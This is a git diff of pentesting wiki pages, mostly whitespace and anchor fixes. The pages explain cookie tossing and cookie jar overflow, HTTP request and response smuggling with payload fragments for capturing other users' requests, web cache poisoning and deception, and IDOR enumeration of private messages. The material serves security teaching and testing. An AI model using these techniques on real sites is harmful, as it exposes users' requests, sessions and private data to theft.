 Table from [here](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/)\
-A cookie with _**SameSite **_attribute will **mitigate CSRF attacks **where a logged session is needed.
+A cookie with _**SameSite**_ attribute will **mitigate CSRF attacks** where a logged session is needed.
 
-**Notice that from Chrome80 (feb/2019) the default behaviour of a cookie without a cookie **_**samesite **_**attribute will be lax **([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)). Notice that temporary, after applying this change, the **cookies without a SameSite** **policy** in Chrome will be **treated as None during the first 2 minutes and then as Lax**.
+**Notice that from Chrome80 (feb/2019) the default behaviour of a cookie without a cookie **_**samesite**_** attribute will be lax** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)). Notice that temporary, after applying this change, the **cookies without a SameSite** **policy** in Chrome will be **treated as None during the first 2 minutes and then as Lax**.
 
 ## Cookies Flags
 
 ### HttpOnly
 
-This avoids the **client **to access the cookie (Via **Javascript **for example: `document.cookie`)
+This avoids the **client** to access the cookie (Via **Javascript** for example: `document.cookie`)
 
 #### **Bypasses**
 
 * This could be Bypassed with **TRACE** **HTTP** requests as the response from the server (if this HTTP method is available) will reflect the cookies sent. This technique is called **Cross-Site Tracking**.
-  * This technique is avoided by **modern browsers by not permitting sending a TRACE **request from JS. However, some bypassed to this have been found in specific software like sending `\r\nTRACE` instead of `TRACE` to IE6.0 SP2.
+  * This technique is avoided by **modern browsers by not permitting sending a TRACE** request from JS. However, some bypassed to this have been found in specific software like sending `\r\nTRACE` instead of `TRACE` to IE6.0 SP2.
 * Another way is the exploitation of zero/day vulnerabilities of the browsers.
 * It's possible to **overwrite HttpOnly cookies** by performing a Cookie Jar overflow attack:
 
@@ -162,4 +162,4 @@ This avoids the **client **to access the cookie (Via **Javascript **for example:
 
 ### Secure
 
-The request will **only **send the cookie in an HTTP request only if the request is transmitted over a secure channel (typically **HTTPS**).
+The request will **only** send the cookie in an HTTP request only if the request is transmitted over a secure channel (typically **HTTPS**).
diff --git a/pentesting-web/hacking-with-cookies/cookie-bomb.md b/pentesting-web/hacking-with-cookies/cookie-bomb.md
index db28cd03..84bcad96 100644
--- a/pentesting-web/hacking-with-cookies/cookie-bomb.md
+++ b/pentesting-web/hacking-with-cookies/cookie-bomb.md
@@ -1,6 +1,6 @@
 # Cookie Bomb
 
-A cookie bomb is basically the capability of **adding a large number of big cookies to a user** for a domain an its subdomains with the goal that the victim will always **send very big HTTP requests **to the server (due to the cookies) that the **server won't accept the request**. Therefore, this will cause a DoS over a user in that domains and subdomains.
+A cookie bomb is basically the capability of **adding a large number of big cookies to a user** for a domain an its subdomains with the goal that the victim will always **send very big HTTP requests** to the server (due to the cookies) that the **server won't accept the request**. Therefore, this will cause a DoS over a user in that domains and subdomains.
 
 A nice **example** can be seen in this write-up: [https://hackerone.com/reports/57356](https://hackerone.com/reports/57356)
 
diff --git a/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md b/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
index 20163e1f..d70e6732 100644
--- a/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
+++ b/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
@@ -1,6 +1,6 @@
 # Cookie Jar Overflow
 
-The browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some cause you need to** make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:
+The browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some cause you need to **make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:
 
 ```javascript
 // Set many cookies
diff --git a/pentesting-web/hacking-with-cookies/cookie-tossing.md b/pentesting-web/hacking-with-cookies/cookie-tossing.md
index af21337b..4ef713f9 100644
--- a/pentesting-web/hacking-with-cookies/cookie-tossing.md
+++ b/pentesting-web/hacking-with-cookies/cookie-tossing.md
@@ -7,20 +7,20 @@ If an attacker is able to **control a subdomain of the domain of a company or fi
 As it was indicated in the Cookies Hacking section, when a **cookie is set to a domain (specifying it) it will be used in the domain and in subdomains.**
 
 {% hint style="danger" %}
-Therefore, **an attacker is going to be able to set to the domain and subdomains an specific cookie doing something like **`document.cookie="session=1234; Path=/app/login; domain=.example.com"`
+Therefore, **an attacker is going to be able to set to the domain and subdomains an specific cookie doing something like** `document.cookie="session=1234; Path=/app/login; domain=.example.com"`
 {% endhint %}
 
 This can be really dangerous as the attacker may be able to:
 
-* **Fixate the cookie of the victim to the attackers account **so if the user doesn't notice, **he will perform the actions in the attackers account **and the attacker may obtain some interesting information (check the history of the searches of the user in the platform, the victim may set his credit card in the account...)
+* **Fixate the cookie of the victim to the attackers account** so if the user doesn't notice, **he will perform the actions in the attackers account** and the attacker may obtain some interesting information (check the history of the searches of the user in the platform, the victim may set his credit card in the account...)
 * If the **cookie doesn't change after login**, the attacker may just **fixate a cookie**, wait until the victim logs in and then **use that cookie to log in as the victim**.
-* If the **cookie is setting some initial value** (like in flask where the **cookie **may **set **the **CSRF token **of the session and this value will be maintained after the victim logs in), the **attacker may set this known value and then abuse it** (in that scenario, the attacker may then make the user perform a CSRF request as he knows the CSRF token).
+* If the **cookie is setting some initial value** (like in flask where the **cookie** may **set** the **CSRF token** of the session and this value will be maintained after the victim logs in), the **attacker may set this known value and then abuse it** (in that scenario, the attacker may then make the user perform a CSRF request as he knows the CSRF token).
 
 ### Cookie Order
 
 When a browser receives two cookies with the same name **partially affecting the same scope** (domain, subdomains and path), the **browser will send both values of the cookie** when both are valid for the request.
 
-Depending on who has **the most specific path **or which one is the **oldest one**, the browser will **set the value of the cookie first** and then the value of the other one like in: `Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
+Depending on who has **the most specific path** or which one is the **oldest one**, the browser will **set the value of the cookie first** and then the value of the other one like in: `Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
 
 Most **web sites will only use the first value**. Then, if an attacker wants to set a cookie it's better to set it before another one if set or set it with a more specific path.
 
@@ -32,13 +32,13 @@ Moreover, the capability to **set a cookie in a more specific path** is very int
 
 A possible protection against this attack would be that the **web server won't accept requests with two cookies with the same name but two different values**.
 
-To bypass the scenario where the attacker is setting a cookie after the victim was already given the cookie, the attacker could cause a **cookie overflow** and then, once the** legit cookie is deleted, set the malicious one**.
+To bypass the scenario where the attacker is setting a cookie after the victim was already given the cookie, the attacker could cause a **cookie overflow** and then, once the **legit cookie is deleted, set the malicious one**.
 
 {% content-ref url="cookie-jar-overflow.md" %}
 [cookie-jar-overflow.md](cookie-jar-overflow.md)
 {% endcontent-ref %}
 
-Another useful **bypass **could be to **URL encode the name of the cookie** as some protections check for 2 cookies with the same name in a request and then the server will decode the names of the cookies.
+Another useful **bypass** could be to **URL encode the name of the cookie** as some protections check for 2 cookies with the same name in a request and then the server will decode the names of the cookies.
 
 ### Cookie Bomb
 
diff --git a/pentesting-web/http-request-smuggling/README.md b/pentesting-web/http-request-smuggling/README.md
index 19b16708..839b8665 100644
--- a/pentesting-web/http-request-smuggling/README.md
+++ b/pentesting-web/http-request-smuggling/README.md
@@ -2,7 +2,7 @@
 
 ## What is
 
-This vulnerability occurs when a **desyncronization **between **front-end proxies** and the **back-end** server allows an **attacker **to **send **an HTTP **request **that will be **interpreted **as a **single request **by the **front-end** proxies (load balance/reverse-proxy) and **as 2 request **by the **back-end** server.\
+This vulnerability occurs when a **desyncronization** between **front-end proxies** and the **back-end** server allows an **attacker** to **send** an HTTP **request** that will be **interpreted** as a **single request** by the **front-end** proxies (load balance/reverse-proxy) and **as 2 request** by the **back-end** server.\
 This allows a user to **modify the next request that arrives to the back-end server after his**.
 
 ### Theory
@@ -22,15 +22,15 @@ This allows a user to **modify the next request that arrives to the back-end ser
 
 ### Reality
 
-The **Front-End **(a load-balance / Reverse Proxy) **process **the _**content-length**_ or the _**transfer-encoding**_ header and the **Back-end** server **process the other **one provoking a **desyncronization **between the 2 systems. \
-This could be very critical as **an attacker will be able to send one request** to the reverse proxy that will be **interpreted **by the **back-end** server **as 2 different requests**. The **danger **of this technique resides in the fact the **back-end** server **will interpret **the **2nd request injected **as if it **came from the next client** and the **real request **of that client will be **part **of the **injected request**.
+The **Front-End** (a load-balance / Reverse Proxy) **process** the _**content-length**_ or the _**transfer-encoding**_ header and the **Back-end** server **process the other** one provoking a **desyncronization** between the 2 systems. \
+This could be very critical as **an attacker will be able to send one request** to the reverse proxy that will be **interpreted** by the **back-end** server **as 2 different requests**. The **danger** of this technique resides in the fact the **back-end** server **will interpret** the **2nd request injected** as if it **came from the next client** and the **real request** of that client will be **part** of the **injected request**.
 
 ### Particularities
 
 Remember that in HTTP **a new line character is composed by 2 bytes: `\r\n`**
 
-* **Content-Length**: This header uses a **decimal number **to indicate the **number **of **bytes **of the **body **of the request. The body is expected to end in the last character, **a new line is not needed in the end of the request**.
-* **Transfer-Encoding: **This header uses in the **body **an **hexadecimal number **to indicate the **number **of **bytes **of the **next chunk**. The **chunk **must **end **with a **new line **but this new line **isn't counted** by the length indicator.  This transfer method must end with a **chunk of size 0 followed by 2 new lines**: `0\r\n\r\n`
+* **Content-Length**: This header uses a **decimal number** to indicate the **number** of **bytes** of the **body** of the request. The body is expected to end in the last character, **a new line is not needed in the end of the request**.
+* **Transfer-Encoding:** This header uses in the **body** an **hexadecimal number** to indicate the **number** of **bytes** of the **next chunk**. The **chunk** must **end** with a **new line** but this new line **isn't counted** by the length indicator.  This transfer method must end with a **chunk of size 0 followed by 2 new lines**: `0\r\n\r\n`
 * **Connection**: Based on my experience it's recommended to use **`Connection: keep-alive`** on the first request of the request Smuggling.
 
 ## Basic Examples
@@ -56,7 +56,7 @@ Here, the **front-end** server uses the **`Content-Length`** header and the **ba
 `GET /404 HTTP/1.1`\
 `Foo: x`
 
-Note how` Content-Length` indicate the **bodies request length is 30 bytes long** (_remember that HTTP uses `\r\n` as new line, so 2bytes each new line_), so the reverse proxy **will send the complete request **to the back-end, and the back-end  will process the `Transfer-Encoding` header leaving the `GET /404 HTTP/1.1` as the** begging of the next request** (BTW, the next request will be appended to `Foo:x<Next request starts here>`).
+Note how `Content-Length` indicate the **bodies request length is 30 bytes long** (_remember that HTTP uses `\r\n` as new line, so 2bytes each new line_), so the reverse proxy **will send the complete request** to the back-end, and the back-end  will process the `Transfer-Encoding` header leaving the `GET /404 HTTP/1.1` as the **begging of the next request** (BTW, the next request will be appended to `Foo:x<Next request starts here>`).
 
 ### TE.CL vulnerabilities
 
@@ -79,7 +79,7 @@ Here, the front-end server uses the `Transfer-Encoding` header and the back-end
 ``\
 ``
 
-In this case the **reverse-proxy** will **send the hole request** to the **back-end** as the **`Transfer-encoding`** indicates so. But, the **back-end** is going to **process **only the **`7b\r\n`** (4bytes) as indicated in the `Content-Lenght` .Therefore, the next request will be the one starting by `GET /404 HTTP/1.1`
+In this case the **reverse-proxy** will **send the hole request** to the **back-end** as the **`Transfer-encoding`** indicates so. But, the **back-end** is going to **process** only the **`7b\r\n`** (4bytes) as indicated in the `Content-Lenght` .Therefore, the next request will be the one starting by `GET /404 HTTP/1.1`
 
 _Note that even if the attack must end with a `0\r\n\r\n` the following request is going to be appended as extra values of the **x** parameter._\
 _Also note that the Content-Length of the embedded request will indicate the length of the next request that is going to b appended to the **x** parameter. If it's too small, only a few bytes will be appended, and if to large (bigger that the length of the next request) and error will be thrown for the next request._
@@ -108,7 +108,7 @@ There are potentially endless ways to obfuscate the `Transfer-Encoding` header.
 `Transfer-Encoding`\
 `: chunked`
 
-Depending on the server (reverse-proxy or backing) that **stops processing **the **TE **header, you will find a **CL.TE vulnerability** or a **TE.CL vulnerability**.
+Depending on the server (reverse-proxy or backing) that **stops processing** the **TE** header, you will find a **CL.TE vulnerability** or a **TE.CL vulnerability**.
 
 ## Finding HTTP Request Smuggling
 
@@ -154,7 +154,7 @@ Since the front-end server uses the `Transfer-Encoding` header, it will forward
 
 ### Probing HTTP Request Smuggling vulnerabilities
 
-Once you have found that the **timing techniques are working** you need to **probe **that you can you can **alter others clients requests**.\
+Once you have found that the **timing techniques are working** you need to **probe** that you can you can **alter others clients requests**.\
 The easiest way to do this is to try to poison your own requests, **make a request for `/` return a 404 for example**.\
 In the [Basic Examples](./#basic-examples) we already saw `CL.TE` and `TE.CL` examples of how to poison a clients request to ask for `/404` provoking a 404 response when the client was asking for any other resource.
 
@@ -223,11 +223,11 @@ Some times the **front-end proxies will perform some security checks**. You can
 ``\
 ``
 
-### Revealing front-end request rewriting <a href="revealing-front-end-request-rewriting" id="revealing-front-end-request-rewriting"></a>
+### Revealing front-end request rewriting <a href="#revealing-front-end-request-rewriting" id="revealing-front-end-request-rewriting"></a>
 
-In many applications, the** front-end server performs some rewriting of requests** before they are forwarded to the back-end server, typically by adding some additional request headers.\
+In many applications, the **front-end server performs some rewriting of requests** before they are forwarded to the back-end server, typically by adding some additional request headers.\
 One common thing to do is to **add to the request the header** `X-Forwarded-For: <IP of the client>` or some similar header so the back-end knows the IP of the client.\
-Sometimes, if you can **find which new values are appended** to the request you could be able to **bypass protections **and **access hidden information**/**endpoints**.
+Sometimes, if you can **find which new values are appended** to the request you could be able to **bypass protections** and **access hidden information**/**endpoints**.
 
 For discovering how is the proxy rewriting the request you need to **find a POST parameter that the back-end will reflect it's value** on the response. Then, use this parameter the last one and use an exploit like this one:
 
@@ -247,12 +247,12 @@ For discovering how is the proxy rewriting the request you need to **find a POST
 
 In this case the next request will be appended after `search=` which is also **the parameter whose value is going to be reflected** on the response, therefore it's going to **reflect the headers of the next request**.
 
-Note that** only the length indicated in the `Content-Length` header of the embedded request is going to be reflected**. If you use a low number, only a few bytes will be reflected, if you use a bigger number than the length of all the headers, then the embedded request will throw and error. Then, you should **start **with a **small number **and **increase **it until you see all you wanted to see.\
+Note that **only the length indicated in the `Content-Length` header of the embedded request is going to be reflected**. If you use a low number, only a few bytes will be reflected, if you use a bigger number than the length of all the headers, then the embedded request will throw and error. Then, you should **start** with a **small number** and **increase** it until you see all you wanted to see.\
 Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n\r\n`. However, independently of the new line characters the values are going to be appended to the search parameter.
 
 Finally note that in this attack we are still attacking ourselves to learn how the front-end proxy is rewriting the request.
 
-### Capturing other users' requests <a href="capturing-other-users-requests" id="capturing-other-users-requests"></a>
+### Capturing other users' requests <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
 
 If you can find a POST request which is going to save the contents of one of the parameters you can append the following request as the value of that parameter in order to store the quest of the next client:
 
@@ -274,7 +274,7 @@ If you can find a POST request which is going to save the contents of one of the
 ``\
 `csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=HACKTRICKS&email=email%40email.com&comment=`
 
-In this case, the value of the** parameter comment** is going to be** saved inside a comment **of a post in the page that is **publicly available**, so a **comment will appear with the content of the next request**.
+In this case, the value of the **parameter comment** is going to be **saved inside a comment** of a post in the page that is **publicly available**, so a **comment will appear with the content of the next request**.
 
 _One limitation with this technique is that it will generally only capture data up until the parameter delimiter that is applicable for the smuggled request. For URL-encoded form submissions, this will be the `&` character, meaning that the content that is stored from the victim user's request will end at the first `&`, which might even appear in the query string._
 
@@ -282,10 +282,10 @@ Note also that this **technique is also exploitable with a TE.CL** vulnerability
 
 ### Using HTTP request smuggling to exploit reflected XSS
 
-If the web page is also** vulnerable to Reflected XSS**, you can abuse HTTP Request Smuggling to attack clients of the web. The exploitation of Reflected XSS from HTTP Request Smuggling have some advantages:
+If the web page is also **vulnerable to Reflected XSS**, you can abuse HTTP Request Smuggling to attack clients of the web. The exploitation of Reflected XSS from HTTP Request Smuggling have some advantages:
 
 * **It requires no interaction with victim users**
-* It can be used to **exploit **XSS behavior in parts of the request that **cannot be trivially controlled in a normal reflected XSS attack**, such as HTTP request headers.
+* It can be used to **exploit** XSS behavior in parts of the request that **cannot be trivially controlled in a normal reflected XSS attack**, such as HTTP request headers.
 
 If a web is vulnerable to Reflected XSS on the User-Agent header you can use this payload to exploit it:
 
@@ -308,7 +308,7 @@ If a web is vulnerable to Reflected XSS on the User-Agent header you can use thi
 ``\
 `A=`
 
-### Using HTTP request smuggling to turn an on-site redirect into an open redirect <a href="using-http-request-smuggling-to-turn-an-on-site-redirect-into-an-open-redirect" id="using-http-request-smuggling-to-turn-an-on-site-redirect-into-an-open-redirect"></a>
+### Using HTTP request smuggling to turn an on-site redirect into an open redirect <a href="#using-http-request-smuggling-to-turn-an-on-site-redirect-into-an-open-redirect" id="using-http-request-smuggling-to-turn-an-on-site-redirect-into-an-open-redirect"></a>
 
 Many applications perform on-site redirects from one URL to another and place the hostname from the request's `Host` header into the redirect URL. An example of this is the default behavior of Apache and IIS web servers, where a request for a folder without a trailing slash receives a redirect to the same folder including the trailing slash:
 
@@ -344,13 +344,13 @@ The smuggled request will trigger a redirect to the attacker's website, which wi
 
 Here, the user's request was for a JavaScript file that was imported by a page on the web site. The attacker can fully compromise the victim user by returning their own JavaScript in the response.
 
-### Using HTTP request smuggling to perform web cache poisoning <a href="using-http-request-smuggling-to-perform-web-cache-poisoning" id="using-http-request-smuggling-to-perform-web-cache-poisoning"></a>
+### Using HTTP request smuggling to perform web cache poisoning <a href="#using-http-request-smuggling-to-perform-web-cache-poisoning" id="using-http-request-smuggling-to-perform-web-cache-poisoning"></a>
 
 If any part of the **front-end infrastructure performs caching of content** (generally for performance reasons) the it **might be possible to poison that cache modifying the response of the server**.
 
 We have already see how to modify the expected returned value from the server to a 404 (in the [Basic Examples](./#basic-examples)), in a similar way you could make the server return the content of /index.html when the poisoned request is asking for `/static/include.js` . This way, the content of the `/static/include.js` will be cached with the content of `/index.html` making `/static/include.js` inaccessible to the clients (DoS?).
 
-Notice this is even more interesting if you find some **Open Redirect **or some** on-site redirect to open redirect** (last section). Because, you could be able to **change the cache values** of `/static/include.js` with the **ones of a script controlled by you** (making a **general XSS to all the clients** that try to download the new version of`/static/include.js`).
+Notice this is even more interesting if you find some **Open Redirect** or some **on-site redirect to open redirect** (last section). Because, you could be able to **change the cache values** of `/static/include.js` with the **ones of a script controlled by you** (making a **general XSS to all the clients** that try to download the new version of`/static/include.js`).
 
 In this example it's going to be shown how you can exploit a **cache poisoning + on-site redirect to open redirect** to modify the contents of the cache of `/static/include.js` to **serve JS code controlled** by the attacker:
 
@@ -370,13 +370,13 @@ In this example it's going to be shown how you can exploit a **cache poisoning +
 ``\
 `x=1`
 
-Note how the embedded request is asking for `/post/next?postId=3` This request is going to be redirected to `/post?postId=4` and **will use the value of the Host header** to indicate the domain. Therefore, you can **modify the Host header **to point the attackers server and the redirect will use that domain (**on-site redirect to open redirect**).
+Note how the embedded request is asking for `/post/next?postId=3` This request is going to be redirected to `/post?postId=4` and **will use the value of the Host header** to indicate the domain. Therefore, you can **modify the Host header** to point the attackers server and the redirect will use that domain (**on-site redirect to open redirect**).
 
-Then,** after poisoning the socket**, you need to send a **GET request **to **`/static/include.js`**this request will be **poisoned **by the **on-site redirect to open redirect** request and will **grab the contents of the attacker controlled script**.
+Then, **after poisoning the socket**, you need to send a **GET request** to **`/static/include.js`**this request will be **poisoned** by the **on-site redirect to open redirect** request and will **grab the contents of the attacker controlled script**.
 
-The next time that somebody ask for `/static/include.js `the cached contents of the attackers script will be server (general XSS).
+The next time that somebody ask for `/static/include.js` the cached contents of the attackers script will be server (general XSS).
 
-### Using HTTP request smuggling to perform web cache deception <a href="using-http-request-smuggling-to-perform-web-cache-deception" id="using-http-request-smuggling-to-perform-web-cache-deception"></a>
+### Using HTTP request smuggling to perform web cache deception <a href="#using-http-request-smuggling-to-perform-web-cache-deception" id="using-http-request-smuggling-to-perform-web-cache-deception"></a>
 
 > **What is the difference between web cache poisoning and web cache deception?**
 >
@@ -396,8 +396,8 @@ In this variant, the attacker smuggles a request that returns some sensitive use
 `GET /private/messages HTTP/1.1`\
 `Foo: X`
 
-If the **poison reaches a client that was accessing some static content **like `/someimage.png` that was going to be **cached**. The contents of `/private/messages` of the victim will be cached in `/someimage.png` and the attacker will be able to steal them.\
-Note that the **attacker doesn't know which static content the victim was trying to access** so probably the best way to test this is to perform the attack, wait a few seconds and** load all** the static contents and **search for the private data**.
+If the **poison reaches a client that was accessing some static content** like `/someimage.png` that was going to be **cached**. The contents of `/private/messages` of the victim will be cached in `/someimage.png` and the attacker will be able to steal them.\
+Note that the **attacker doesn't know which static content the victim was trying to access** so probably the best way to test this is to perform the attack, wait a few seconds and **load all** the static contents and **search for the private data**.
 
 ### Weaponizing HTTP Request Smuggling with HTTP Response Desynchronisation
 
diff --git a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
index 819939ea..80bad297 100644
--- a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
+++ b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
@@ -2,7 +2,7 @@
 
 ## Origins
 
-The main origin of this vulnerability is the fact that the **reverse proxy** is going to **talk with the client **using **HTTP/2** but then it will **transform** that **communication** with the **back-end server** to **HTTP/1.1**.
+The main origin of this vulnerability is the fact that the **reverse proxy** is going to **talk with the client** using **HTTP/2** but then it will **transform** that **communication** with the **back-end server** to **HTTP/1.1**.
 
 ![](<../../.gitbook/assets/image (636).png>)
 
@@ -32,7 +32,7 @@ This is exactly the same technique as before, but checking the requests James no
 
 ### H2.TE via Request Header Injection
 
-**HTTP/2 also won't allow to put not permitted characters in headers**, but if the server** isn't respecting** this rule, you can** inject arbitrary headers **when the communication is **downgraded** to HTTP/1.1.
+**HTTP/2 also won't allow to put not permitted characters in headers**, but if the server **isn't respecting** this rule, you can **inject arbitrary headers** when the communication is **downgraded** to HTTP/1.1.
 
 In this case **the header Transfer-Encoding was injected**.
 
@@ -70,7 +70,7 @@ Sometimes you will find that preforming a HTTP Request Smuggling attack **you ca
 
 Note that **even** with that **restriction** you still can perform attacks like **authorization bypasses**, internal headers leakage and **cache deception and cache poisoning** attacks.
 
-Usually this restriction doesn't exist so you can** smuggle request into the connection between the reverse proxy and the back end** that other people are using, but it's even **possible** that the **proxy** doesn't **even reuse a connection with connections from the same IP **(pretty heavy restriction for this kind of attack).
+Usually this restriction doesn't exist so you can **smuggle request into the connection between the reverse proxy and the back end** that other people are using, but it's even **possible** that the **proxy** doesn't **even reuse a connection with connections from the same IP** (pretty heavy restriction for this kind of attack).
 
 ![](<../../.gitbook/assets/image (646).png>)
 
@@ -78,7 +78,7 @@ In the heaviest restriction (no connection reuse) you will detect the vulnerabil
 
 ### Tunnelling Confirmation
 
-A way to **confirm** if the **endpoint is vulnerable** but the connection is **inside a "tunnel"** is to **smuggle 2 full requests **into 1.
+A way to **confirm** if the **endpoint is vulnerable** but the connection is **inside a "tunnel"** is to **smuggle 2 full requests** into 1.
 
 The **problem** with **HTTP/1.1** is that if you **receive 2 HTTP responses** you **don't know** if the endpoint was **vulnerable** or it isn't and the **"smuggled" request was just treated as a regular request**.
 
@@ -88,7 +88,7 @@ However, this technique can be used **in HTTP/2** because if the endpoint was **
 
 ### Tunnel-vision Problem
 
-There could be another problem, if the **response** to the legit request **contains** a **Content-Length**, the** reverse prox**y is only going to **read the bytes specified there and no more, so you won't be able to read the response from the smuggled request.**
+There could be another problem, if the **response** to the legit request **contains** a **Content-Length**, the **reverse prox**y is only going to **read the bytes specified there and no more, so you won't be able to read the response from the smuggled request.**
 
 However, the **HEAD** request **doesn't contain a body** but it usually **contains** the **Content-Length** as if the request was a GET request. Therefore, sending a **HEAD** request **instead of a POST** request you can **read the HEAD Content-Length** bytes of the smuggled request response.
 
diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md
index 5f83e22f..898767dd 100644
--- a/pentesting-web/http-response-smuggling-desync.md
+++ b/pentesting-web/http-response-smuggling-desync.md
@@ -28,7 +28,7 @@ Moreover, is the **attacker then perform a request** and the **legitimate respon
 
 ### Multiple Nested Injections
 
-Another** interesting difference** with common **HTTP Request Smuggling** is that, in a common smuggling attack, the **goal** is to **modify the beginning of the victims request** so it perform an unexpected action. In a **HTTP Response smuggling attack**, as you are **sending full requests**, you can **inject in one payload tens of responses** that will be **desynchronising tens of users** that will be **receiving** the **injected** **responses**.
+Another **interesting difference** with common **HTTP Request Smuggling** is that, in a common smuggling attack, the **goal** is to **modify the beginning of the victims request** so it perform an unexpected action. In a **HTTP Response smuggling attack**, as you are **sending full requests**, you can **inject in one payload tens of responses** that will be **desynchronising tens of users** that will be **receiving** the **injected** **responses**.
 
 Apart from being able to **distribute more easily tens of exploits** across legitimate users, this could also be used to cause a **DoS** in the server.
 
@@ -38,19 +38,19 @@ As explained previously, in order to abuse this technique, it's needed that the
 
 This **time consuming request is enough** if we just want to **try to steal the victims response.** But if you want to perform a more complex exploit this will be a common structure for the exploit.
 
-First of all the **initial** request abusing **HTTP** **Request** **smuggling**, then the **time consuming request **and then **1 or more payload requests** that whose responses will be sent to the victims.
+First of all the **initial** request abusing **HTTP** **Request** **smuggling**, then the **time consuming request** and then **1 or more payload requests** that whose responses will be sent to the victims.
 
 ## Abusing HTTP Response Queue Desynchronisation
 
-### Capturing other users' requests <a href="capturing-other-users-requests" id="capturing-other-users-requests"></a>
+### Capturing other users' requests <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
 
-As with HTTP Request Smuggling known payloads, you can **steal the victims request **with one important difference: In this case you just need the **send content to be reflected in the response**, **no persistent storage** is needed.
+As with HTTP Request Smuggling known payloads, you can **steal the victims request** with one important difference: In this case you just need the **send content to be reflected in the response**, **no persistent storage** is needed.
 
 First, the attacker send a payload containing a **final POST request with the reflected parameter** at the end and a large Content-Length
 
 ![](<../.gitbook/assets/image (625).png>)
 
-Then, once the** initial request** (blue) was **processed** and **while** the **sleepy** one is being processed (yellow) the **next request that arrives from a victim** is going to be **appended in the queue just after the reflected parameter**:
+Then, once the **initial request** (blue) was **processed** and **while** the **sleepy** one is being processed (yellow) the **next request that arrives from a victim** is going to be **appended in the queue just after the reflected parameter**:
 
 ![](<../.gitbook/assets/image (634).png>)
 
@@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
 
 This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
 
-![](<../.gitbook/assets/image (630).png>)
+![](<../.gitbook/assets/image (630) (1).png>)
 
 ### Response Splitting
 
@@ -124,7 +124,7 @@ The victim will receive as response the **HEAD response + the content of the sec
 
 However, note how the **reflected data had a size according to the Content-Length** of the **HEAD** response that **generated a valid HTTP response in the response queue**.
 
-Therefore, the **next request of the second victim** will be **receiving** as** response something completely crafted by the attacker**. As the response is completely crafted by the attacker he can also **make the proxy cache the response**.
+Therefore, the **next request of the second victim** will be **receiving** as **response something completely crafted by the attacker**. As the response is completely crafted by the attacker he can also **make the proxy cache the response**.
 
 ## References
 
diff --git a/pentesting-web/idor.md b/pentesting-web/idor.md
index cc2ffc11..ae4a3b01 100644
--- a/pentesting-web/idor.md
+++ b/pentesting-web/idor.md
@@ -1,10 +1,10 @@
 # IDOR
 
-**Post taken from **[**https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489**](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)****
+**Post taken from** [**https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489**](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)****
 
-## Unsuspected places to look for IDORs <a href="8d15" id="8d15"></a>
+## Unsuspected places to look for IDORs <a href="#8d15" id="8d15"></a>
 
-### Don’t ignore encoded and hashed IDs <a href="d6ce" id="d6ce"></a>
+### Don’t ignore encoded and hashed IDs <a href="#d6ce" id="d6ce"></a>
 
 When faced with an encoded ID, it might be possible to decode the encoded ID using common encoding schemes.
 
@@ -18,21 +18,21 @@ For example, once I found an API endpoint that allows users to retrieve detailed
 GET /api_v1/messages?conversation_id=SOME_RANDOM_ID
 ```
 
-This seems okay at first glance since the _conversation_id _is a long, random, alphanumeric sequence. But I later found that you can actually find a list of conversations for each user just by using their user ID!
+This seems okay at first glance since the _conversation\_id_ is a long, random, alphanumeric sequence. But I later found that you can actually find a list of conversations for each user just by using their user ID!
 
 ```
 GET /api_v1/messages?user_id=ANOTHER_USERS_ID
 ```
 
-This would return a list of _conversation_ids_ belonging to that user. And the _user_id_ is publicly available on each user’s profile page. Therefore, you can read any user’s messages by first obtaining their user_id on their profile page, then retrieving a list of conversation_ids belonging to that user, and finally loading the messages via the API endpoint /api_v1/messages!
+This would return a list of _conversation\_ids_ belonging to that user. And the _user\_id_ is publicly available on each user’s profile page. Therefore, you can read any user’s messages by first obtaining their user\_id on their profile page, then retrieving a list of conversation\_ids belonging to that user, and finally loading the messages via the API endpoint /api\_v1/messages!
 
-### If you can’t guess it, try creating it <a href="b54f" id="b54f"></a>
+### If you can’t guess it, try creating it <a href="#b54f" id="b54f"></a>
 
 If the object reference IDs seem unpredictable, see if there is something you can do to manipulate the creation or linking process of these object IDs.
 
-### Offer the application an ID, even if it doesn’t ask for it <a href="9292" id="9292"></a>
+### Offer the application an ID, even if it doesn’t ask for it <a href="#9292" id="9292"></a>
 
-If no IDs are used in the application generated request, try adding it to the request. Try appending _id, user_id, message_id_ or other object reference params and see if it makes a difference to the application’s behavior.
+If no IDs are used in the application generated request, try adding it to the request. Try appending _id, user\_id, message\_id_ or other object reference params and see if it makes a difference to the application’s behavior.
 
 For example, if this request displays all your direct messages:
 
